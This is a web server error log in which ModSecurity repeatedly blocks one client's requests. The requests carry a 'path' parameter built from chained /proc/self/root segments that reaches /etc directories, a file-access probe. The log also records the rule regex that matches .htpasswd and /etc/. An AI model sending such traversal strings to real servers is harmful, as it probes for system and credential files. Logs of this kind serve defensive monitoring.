https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:25.078030 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:55614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUfQbLMZ6AikZjR9UeswAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:28.907527 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:43080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUgNa6ubjKNq_cu4b-egAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:34.321146 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:43094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUhta6ubjKNq_cu4b-gAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:36.137795 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34112] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:15:39.211859 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:56502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUi-yqAr6etmhZHNol7wAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:43.884803 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:56506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUjwkwaGbbGflqUZB0hgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:43.885933 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:56506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:44.339612 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:56518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUkBkFeYa1D6dYQnCuMQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:47.766687 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:36420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUk-oXxyEfFpUF8f_TVwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:50.632823 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:36436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUlta6ubjKNq_cu4b-iQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:54.662248 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:36446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUmvu8EFLIOrSqIptfBQAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:15:59.137800 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34774] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:15:59.365628 2026] [mime_magic:error] [pid 31803:tid 140411540502272] (70014)End of file found: [client 57.141.18.12:37044] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:16:00.538516 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.241.31:35308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUoF_V7PWP6ixUYl59mwAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:16:04.727325 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:35310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUpAbLMZ6AikZjR9Ue3QAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:10.272879 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.241.31:59852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUqBkFeYa1D6dYQnCuQQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:13.131354 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:59858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUrfu8EFLIOrSqIptfEwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:17.011845 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.241.31:59866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUsV_V7PWP6ixUYl59oAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:21.079537 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:37852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUtQkwaGbbGflqUZB0lAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:16:22.166381 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:16:23.145893 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:37852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUtwkwaGbbGflqUZB0mAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:24.975084 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:37856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUuF_V7PWP6ixUYl59owAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:16:27.363879 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.241.31:41440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUuxkFeYa1D6dYQnCuTwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:29.183362 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.241.31:41454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUvRkFeYa1D6dYQnCuVQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:16:30.743150 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:41460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUvuyqAr6etmhZHNomCgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
